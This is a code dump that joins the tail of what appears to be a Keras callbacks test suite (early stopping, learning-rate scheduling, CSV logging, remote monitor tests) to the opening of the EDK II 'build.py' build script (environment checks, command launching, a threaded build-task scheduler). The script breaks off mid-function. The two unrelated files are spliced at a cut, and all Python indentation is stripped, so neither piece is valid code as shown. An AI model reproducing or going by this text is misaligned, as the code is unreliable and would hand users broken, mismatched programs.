# so with patience=2 we need to end up at epoch 4
assert early_stop.model.get_weights() == 4
def test_EarlyStopping_final_weights_when_restoring_model_weights():
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
assert early_stop.model.get_weights() == 2
def test_LearningRateScheduler():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5)
assert (float(K.get_value(model.optimizer.lr)) - 0.2) < K.epsilon()
def test_ReduceLROnPlateau():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)]
model.fit(X_train, y_train,
batch_size=batch_size,
validation_data=(X_test, y_test),
callbacks=cbks,
epochs=5,
verbose=2)
assert_allclose(
float(K.get_value(model.optimizer.lr)), 0.01, atol=K.epsilon())
model = make_model()
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1,
min_delta=0, patience=1, cooldown=5)]
model.fit(X_train, y_train,
batch_size=batch_size,
validation_data=(X_test, y_test),
callbacks=cbks,
epochs=5,
verbose=2)
assert_allclose(
float(K.get_value(model.optimizer.lr)), 0.1, atol=K.epsilon())
def test_ReduceLROnPlateau_patience():
class DummyOptimizer(object):
def __init__(self):
self.lr = K.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = callbacks.ReduceLROnPlateau(monitor='val_loss',
patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(K.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
assert all([lr == 1.0 for lr in lrs[:-1]]) and lrs[-1] < 1.0
def test_ReduceLROnPlateau_backwards_compatibility():
import warnings
with warnings.catch_warnings(record=True) as ws:
reduce_on_plateau = callbacks.ReduceLROnPlateau(epsilon=1e-13)
# Check if warnings are disabled
if os.environ.get("PYTHONWARNINGS") != "ignore":
assert "`epsilon` argument is deprecated" in str(ws[0].message)
assert not hasattr(reduce_on_plateau, 'epsilon')
assert hasattr(reduce_on_plateau, 'min_delta')
assert reduce_on_plateau.min_delta == 1e-13
def test_CSVLogger(tmpdir):
np.random.seed(1337)
filepath = str(tmpdir / 'log.tsv')
sep = '\t'
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [callbacks.CSVLogger(filepath, separator=sep)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
with open(filepath) as csvfile:
dialect = Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
# case 3, reuse of CSVLogger object
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=2)
import re
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = " ".join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
assert not tmpdir.listdir()
def test_CallbackValData():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbk = callbacks.LambdaCallback(on_train_end=lambda x: 1)
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=[cbk], epochs=1)
cbk2 = callbacks.LambdaCallback(on_train_end=lambda x: 1)
train_generator = data_generator(X_train, y_train, batch_size)
model.fit_generator(train_generator, len(X_train), epochs=1,
validation_data=(X_test, y_test),
callbacks=[cbk2])
# callback validation data should always have x, y, and sample weights
assert len(cbk.validation_data) == len(cbk2.validation_data) == 3
assert cbk.validation_data[0] is cbk2.validation_data[0]
assert cbk.validation_data[1] is cbk2.validation_data[1]
assert cbk.validation_data[2].shape == cbk2.validation_data[2].shape
def test_LambdaCallback():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model training and
# be terminated after training has completed.
def f():
while True:
pass
p = multiprocessing.Process(target=f)
p.start()
cleanup_callback = callbacks.LambdaCallback(
on_train_end=lambda logs: p.terminate())
cbks = [cleanup_callback]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5)
p.join()
assert not p.is_alive()
@pytest.mark.skipif(K.backend() != 'tensorflow', reason='Uses TensorBoard')
def test_TensorBoard_with_ReduceLROnPlateau(tmpdir):
import shutil
np.random.seed(np.random.randint(1, 1e7))
filepath = str(tmpdir / 'logs')
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='binary_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [
callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.5,
patience=4,
verbose=1),
callbacks.TensorBoard(
log_dir=filepath)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=2)
assert os.path.isdir(filepath)
shutil.rmtree(filepath)
assert not tmpdir.listdir()
def tests_RemoteMonitor():
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.RemoteMonitor()]
with patch('requests.post'):
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
def tests_RemoteMonitorWithJsonPayload():
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.RemoteMonitor(send_as_json=True)]
with patch('requests.post'):
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
if __name__ == '__main__':
pytest.main([__file__])
|
build.py | ## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Common.LongFilePathOs as os
import re
import StringIO
import sys
import glob
import time
import platform
import traceback
import encodings.ascii
import itertools
import multiprocessing
from struct import *
from threading import *
from optparse import OptionParser
from subprocess import *
from Common import Misc as Utils
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.LongFilePathSupport import LongFilePath
from Common.TargetTxtClassObject import *
from Common.ToolDefClassObject import *
from Common.DataType import *
from Common.BuildVersion import gBUILD_VERSION
from AutoGen.AutoGen import *
from Common.BuildToolError import *
from Workspace.WorkspaceDatabase import *
from Common.MultipleWorkspace import MultipleWorkspace as mws
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import *
from PatchPcdValue.PatchPcdValue import *
import Common.EdkLogger
import Common.GlobalData as GlobalData
from GenFds.GenFds import GenFds
from collections import OrderedDict,defaultdict
# Version and Copyright
VersionNumber = "0.60" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + VersionNumber
__copyright__ = "Copyright (c) 2007 - 2017, Intel Corporation All rights reserved."
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
if os.environ.has_key('PATHEXT'):
extns = os.environ['PATHEXT'].split(os.path.pathsep)
else:
extns = ('',)
for pathDir in os.environ['PATH'].split(os.path.pathsep):
for ext in extns:
if os.path.exists(os.path.join(pathDir, tool + ext)):
return True
return False
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory contains all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of above environment variable is not set or has error, the build
# will be broken.
#
def CheckEnvVariable():
# check WORKSPACE
if "WORKSPACE" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
if not os.path.exists(WorkspaceDir):
EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData="%s" % WorkspaceDir)
elif ' ' in WorkspaceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
ExtraData=WorkspaceDir)
os.environ["WORKSPACE"] = WorkspaceDir
# set multiple workspace
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(WorkspaceDir, PackagesPath)
if mws.PACKAGES_PATH:
for Path in mws.PACKAGES_PATH:
if not os.path.exists(Path):
EdkLogger.error("build", FILE_NOT_FOUND, "One Path in PACKAGES_PATH doesn't exist", ExtraData="%s" % Path)
elif ' ' in Path:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in PACKAGES_PATH", ExtraData=Path)
#
# Check EFI_SOURCE (Edk build convention). EDK_SOURCE will always point to ECP
#
if "ECP_SOURCE" not in os.environ:
os.environ["ECP_SOURCE"] = mws.join(WorkspaceDir, GlobalData.gEdkCompatibilityPkg)
if "EFI_SOURCE" not in os.environ:
os.environ["EFI_SOURCE"] = os.environ["ECP_SOURCE"]
if "EDK_SOURCE" not in os.environ:
os.environ["EDK_SOURCE"] = os.environ["ECP_SOURCE"]
#
# Unify case of characters on case-insensitive systems
#
EfiSourceDir = os.path.normcase(os.path.normpath(os.environ["EFI_SOURCE"]))
EdkSourceDir = os.path.normcase(os.path.normpath(os.environ["EDK_SOURCE"]))
EcpSourceDir = os.path.normcase(os.path.normpath(os.environ["ECP_SOURCE"]))
os.environ["EFI_SOURCE"] = EfiSourceDir
os.environ["EDK_SOURCE"] = EdkSourceDir
os.environ["ECP_SOURCE"] = EcpSourceDir
os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
if not os.path.exists(EcpSourceDir):
EdkLogger.verbose("ECP_SOURCE = %s doesn't exist. Edk modules could not be built." % EcpSourceDir)
elif ' ' in EcpSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in ECP_SOURCE path",
ExtraData=EcpSourceDir)
if not os.path.exists(EdkSourceDir):
if EdkSourceDir == EcpSourceDir:
EdkLogger.verbose("EDK_SOURCE = %s doesn't exist. Edk modules could not be built." % EdkSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE does not exist",
ExtraData=EdkSourceDir)
elif ' ' in EdkSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EDK_SOURCE path",
ExtraData=EdkSourceDir)
if not os.path.exists(EfiSourceDir):
if EfiSourceDir == EcpSourceDir:
EdkLogger.verbose("EFI_SOURCE = %s doesn't exist. Edk modules could not be built." % EfiSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE does not exist",
ExtraData=EfiSourceDir)
elif ' ' in EfiSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EFI_SOURCE path",
ExtraData=EfiSourceDir)
# check those variables on single workspace case
if not PackagesPath:
# change absolute path to relative path to WORKSPACE
if EfiSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EFI_SOURCE = %s" % (WorkspaceDir, EfiSourceDir))
if EdkSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EDK_SOURCE = %s" % (WorkspaceDir, EdkSourceDir))
if EcpSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "ECP_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n ECP_SOURCE = %s" % (WorkspaceDir, EcpSourceDir))
# check EDK_TOOLS_PATH
if "EDK_TOOLS_PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="EDK_TOOLS_PATH")
# check PATH
if "PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="PATH")
GlobalData.gWorkspace = WorkspaceDir
GlobalData.gEfiSource = EfiSourceDir
GlobalData.gEdkSource = EdkSourceDir
GlobalData.gEcpSource = EcpSourceDir
GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
GlobalData.gGlobalDefines["EFI_SOURCE"] = EfiSourceDir
GlobalData.gGlobalDefines["EDK_SOURCE"] = EdkSourceDir
GlobalData.gGlobalDefines["ECP_SOURCE"] = EcpSourceDir
GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
# check if the path is absolute or relative
if os.path.isabs(FilePath):
FileFullPath = os.path.normpath(FilePath)
else:
FileFullPath = os.path.normpath(mws.join(Workspace, FilePath))
Workspace = mws.getWs(Workspace, FilePath)
# check if the file path exists or not
if not os.path.isfile(FileFullPath):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
# remove workspace directory from the beginning part of the file path
if Workspace[-1] in ["\\", "/"]:
return FileFullPath[len(Workspace):]
else:
return FileFullPath[(len(Workspace) + 1):]
## Get the output of an external program
#
# This is the entrance method of thread reading output of an external program and
# putting them in STDOUT/STDERR of current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != "":
To(Line.rstrip())
else:
break
if ExitFlag.isSet():
break
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir):
BeginTime = time.time()
# if working directory doesn't exist, Popen() will raise an exception
if not os.path.isdir(WorkingDir):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
# Command is used as the first Argument in following Popen().
# It could be a string or sequence. We find that if command is a string in following Popen(),
# ubuntu may fail with an error message that the command is not found.
# So here we may need convert command from string to list instance.
if platform.system() != 'Windows':
if not isinstance(Command, list):
Command = Command.split()
Command = ' '.join(Command)
Proc = None
EndOfProcedure = None
try:
# launch the command
Proc = Popen(Command, stdout=PIPE, stderr=PIPE, env=os.environ, cwd=WorkingDir, bufsize=-1, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Proc.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Proc.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Proc.wait()
except: # in case of aborting
# terminate the threads redirecting the program output
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
if EndOfProcedure is not None:
EndOfProcedure.set()
if Proc is None:
if type(Command) != type(""):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
if Proc.stdout:
StdOutThread.join()
if Proc.stderr:
StdErrThread.join()
# check the return code of the program
if Proc.returncode != 0:
if type(Command) != type(""):
Command = " ".join(Command)
# print out the Response file and its content when make failure
RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
if os.path.isfile(RespFile):
f = open(RespFile)
RespContent = f.read()
f.close()
EdkLogger.info(RespContent)
EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
return "%dms" % (int(round((time.time() - BeginTime) * 1000)))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise there could be build units
# missing build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
## The constructor
#
# @param self The object pointer
# @param Obj The object the build is working on
# @param Target The build target name, one of gSupportedTarget
# @param Dependency The BuildUnit(s) which must be completed in advance
# @param WorkingDir The directory build command starts in
#
def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
self.BuildObject = Obj
self.Dependency = Dependency
self.WorkingDir = WorkingDir
self.Target = Target
self.BuildCommand = BuildCommand
if not BuildCommand:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
ExtraData=str(Obj))
## str() method
#
# It just returns the string representation of self.BuildObject
#
# @param self The object pointer
#
def __str__(self):
return str(self.BuildObject)
## "==" operator method
#
# It just compares self.BuildObject with "Other". So self.BuildObject must
# provide its own __eq__() method.
#
# @param self The object pointer
# @param Other The other BuildUnit object compared to
#
def __eq__(self, Other):
return Other and self.BuildObject == Other.BuildObject \
and Other.BuildObject \
and self.BuildObject.Arch == Other.BuildObject.Arch
## hash() method
#
# It just returns the hash value of self.BuildObject which must be hashable.
#
# @param self The object pointer
#
def __hash__(self):
return hash(self.BuildObject) + hash(self.BuildObject.Arch)
def __repr__(self):
return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The ModuleAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(La, Target) for La in Obj.LibraryAutoGenList]
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
if Target in [None, "", "all"]:
self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The PlatformAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(Lib, Target) for Lib in self.BuildObject.LibraryAutoGenList]
Dependency.extend([ModuleMakeUnit(Mod, Target) for Mod in self.BuildObject.ModuleAutoGenList])
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
# queue for tasks waiting for schedule
_PendingQueue = OrderedDict()
_PendingQueueLock = threading.Lock()
# queue for tasks ready for running
_ReadyQueue = OrderedDict()
_ReadyQueueLock = threading.Lock()
# queue for run tasks
_RunningQueue = OrderedDict()
_RunningQueueLock = threading.Lock()
# queue containing all build tasks, in case duplicate build
_TaskQueue = OrderedDict()
# flag indicating error occurs in a running thread
_ErrorFlag = threading.Event()
_ErrorFlag.clear()
_ErrorMessage = ""
# BoundedSemaphore object used to control the number of running threads
_Thread = None
# flag indicating if the scheduler is started or not
_SchedulerStopped = threading.Event()
_SchedulerStopped.set()
## Start the task scheduler thread
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def StartScheduler(MaxThreadNumber, ExitFlag):
SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
SchedulerThread.setName("Build-Task-Scheduler")
SchedulerThread.setDaemon(False)
SchedulerThread.start()
# wait for the scheduler to be started, especially useful in Linux
while not BuildTask.IsOnGoing():
time.sleep(0.01)
## Scheduler method
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def Scheduler(MaxThreadNumber, ExitFlag):
BuildTask._SchedulerStopped.clear()
try:
# use BoundedSemaphore to control the maximum running threads
BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
#
# scheduling loop, which will exits when no pending/ready task and
# indicated to do so, or there's error in running thread
#
while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
or not ExitFlag.isSet()) and not BuildTask._ErrorFlag.isSet():
EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
% (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
# get all pending tasks
BuildTask._PendingQueueLock.acquire()
BuildObjectList = BuildTask._PendingQueue.keys()
#
# check if their dependency is resolved, and if true, move them
# into ready queue
#
for BuildObject in BuildObjectList:
Bt = BuildTask._PendingQueue[BuildObject]
if Bt.IsReady():
BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
BuildTask._PendingQueueLock.release()
# launch build thread until the maximum number of threads is reached
while not BuildTask._ErrorFlag.isSet():
# empty ready queue, do nothing further
if len(BuildTask._ReadyQueue) == 0:
break
# wait for active thread(s) exit
BuildTask._Thread.acquire(True)
# start a new build thread
Bo,Bt = BuildTask._ReadyQueue.popitem()
# move into running queue
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue[Bo] = Bt
BuildTask._RunningQueueLock.release()
Bt.Start()
# avoid tense loop
time.sleep(0.01)
# avoid tense loop
time.sleep(0.01)
# wait for all running threads exit
if BuildTask._ErrorFlag.isSet():
EdkLogger.quiet("\nWaiting for all build threads exit...")
# while not BuildTask._ErrorFlag.isSet() and \
while len(BuildTask._RunningQueue) > 0:
EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join(Th.getName() for Th in threading.enumerate()))
# avoid tense loop
time.sleep(0.1)
except BaseException, X:
#
# TRICK: hide the output of threads left runing, so that the user can
# catch the error message easily
#
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
BuildTask._PendingQueue.clear()
BuildTask._ReadyQueue.clear()
BuildTask._RunningQueue.clear()
BuildTask._TaskQueue.clear()
BuildTask._SchedulerStopped.set()
## Wait for all running method exit
#
@staticmethod
def WaitForComplete():
BuildTask._SchedulerStopped.wait()
## Check if the scheduler is running or not
#
@staticmethod
def IsOnGoing():
return not BuildTask._SchedulerStopped.isSet()
## Abort the build
@staticmethod
def Abort():
if BuildTask.IsOnGoing():
BuildTask._ErrorFlag.set()
BuildTask.WaitForComplete()
## Check if there's error in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use threading.Event to communicate this formation to main thread.
#
@staticmethod
def HasError():
return BuildTask._ErrorFlag.isSet()
## Get error message in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use a static variable to communicate this message to main thread.
#
@staticmethod
def GetErrorMessage():
return BuildTask._ErrorMessage
## Factory method to create a BuildTask object
#
# This method will check if a module is building or has been built. And if
# true, just return the associated BuildTask object in the _TaskQueue. If
# not, create and return a new BuildTask object. The new BuildTask object
# will be appended to the _PendingQueue for scheduling later.
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
@staticmethod
def New(BuildItem, Dependency=None):
if BuildItem in BuildTask._TaskQueue:
Bt = BuildTask._TaskQueue[BuildItem]
return Bt
Bt = BuildTask()
Bt._Init(BuildItem, Dependency)
BuildTask._TaskQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.acquire()
BuildTask._PendingQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.release()
return Bt
## The real constructor of BuildTask
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
def _Init(self, BuildItem, Dependency=None):
self.BuildItem = BuildItem
self.DependencyList = []
if Dependency is None:
Dependency = BuildItem.Dependency
else:
Dependency.extend(BuildItem.Dependency)
self.AddDependency(Dependency)
# flag indicating build completes, used to avoid unnecessary re-build
self.CompleteFlag = False
## Check if all dependent build tasks are completed or not
#
def IsReady(self):
ReadyFlag = True
for Dep in self.DependencyList:
if Dep.CompleteFlag == True:
continue
ReadyFlag = False
break
return ReadyFlag
## Add dependent build task
#
# @param Dependency The list of dependent build objects
#
def AddDependency(self, Dependency):
for Dep in Dependency:
if not Dep.BuildObject.IsBinaryModule:
self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
## The thread wrapper of LaunchCommand function
#
# @param Command A list or string contains the call of the command
# @param WorkingDir The directory in which the program will be running
#
def _CommandThread(self, Command, WorkingDir):
try:
self.BuildItem.BuildObject.BuildTime = LaunchCommand(Command, WorkingDir)
self.CompleteFlag = True
except:
#
